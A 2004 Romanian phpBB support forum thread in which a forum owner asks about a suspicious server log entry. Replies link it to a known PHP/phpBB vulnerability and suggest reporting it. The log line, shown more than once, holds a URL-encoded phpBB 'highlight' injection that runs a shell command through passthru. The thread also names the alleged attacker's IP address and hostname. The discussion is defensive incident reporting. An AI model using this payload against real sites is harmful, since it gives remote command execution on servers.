Administratorul serverului care asigura hosting-ul forumului meu a gasit niste loguri dubioase din care reproduc unul singur! Aveti vreo idee despre ce este vorba?
"ADRESA IP" - - ["DATA cand s-a intamplat"] "GET
/viewtopic.php?t=%31%37%32&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77%3B%20%65%63%68%6F%20%5F%45%4
E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
HTTP/1.1" 200 40632
Multumiri anticipate!
/viewtopic.php?t=... &rush... highlight=%25
Reguli forum
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
-
bogdan
- Mesaje: 10888
- Membru din: 18-Oct-2002, 13:14:27
- Versiune: 3.0.11
- Ext: Da
- Server: UNIX/Linux
- Nivel phpBB: Experimentat
- Nivel php: Mediu
- Localitate: Bucuresti
- Contact:
vezi anuntul Vulnerabilitati multiple in PHP !
vei afla acolo ce s-a intamplat si ce trebuie facut !
vei afla acolo ce s-a intamplat si ce trebuie facut !
-
bogdan
- Mesaje: 10888
- Membru din: 18-Oct-2002, 13:14:27
- Versiune: 3.0.11
- Ext: Da
- Server: UNIX/Linux
- Nivel phpBB: Experimentat
- Nivel php: Mediu
- Localitate: Bucuresti
- Contact:
ce ai putea face ? eventual sa blochezi IP-ul respectiv si sa iei legatura cu providerul de care tine IP-ul si sa le semnalezi acest aspect.
am vazut pe phpbb.com ca au fost unii care spuneau ca au semnalat chiar si FBI-ul pt recentele probleme ale phpBB-ului cu Santy.A worm si NeverEverNoSanityforDummies
am vazut pe phpbb.com ca au fost unii care spuneau ca au semnalat chiar si FBI-ul pt recentele probleme ale phpBB-ului cu Santy.A worm si NeverEverNoSanityforDummies
Scopul acestui mesaj este de prevenire, in primul rand.
In ideea ca astfel de actiuni trebuie combatute si ca aceasta comunitate trebuie ferita de eventuali membri cu astfel de 'indeletniciri' completez postarea mea si cu IP-ul respectiv.
80.97.93.226 (home15526.astral.buzau.ro), iar data la care a fost incercata intruziunea a fost 11 decembrie 2004.
Astel, logul din topic arata:
80.97.93.226 - - [11/Dec/2004:02:03:50 -0500] "GET
/viewtopic.php?t=%31%37%32&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77%3B%20%65%63%68%6F%20%5F%45%4
E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
HTTP/1.1" 200 40632
Sigur, logurile au fost inaintate firmai Astral, dar ideea de baza, aici o reprezinta un semnal de alarma pentru aceasta comunitate si un avertisment pentru posesorul IP-ului.
In ideea ca astfel de actiuni trebuie combatute si ca aceasta comunitate trebuie ferita de eventuali membri cu astfel de 'indeletniciri' completez postarea mea si cu IP-ul respectiv.
80.97.93.226 (home15526.astral.buzau.ro), iar data la care a fost incercata intruziunea a fost 11 decembrie 2004.
Astel, logul din topic arata:
80.97.93.226 - - [11/Dec/2004:02:03:50 -0500] "GET
/viewtopic.php?t=%31%37%32&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77%3B%20%65%63%68%6F%20%5F%45%4
E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
HTTP/1.1" 200 40632
Sigur, logurile au fost inaintate firmai Astral, dar ideea de baza, aici o reprezinta un semnal de alarma pentru aceasta comunitate si un avertisment pentru posesorul IP-ului.
Cine este conectat
Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 4 vizitatori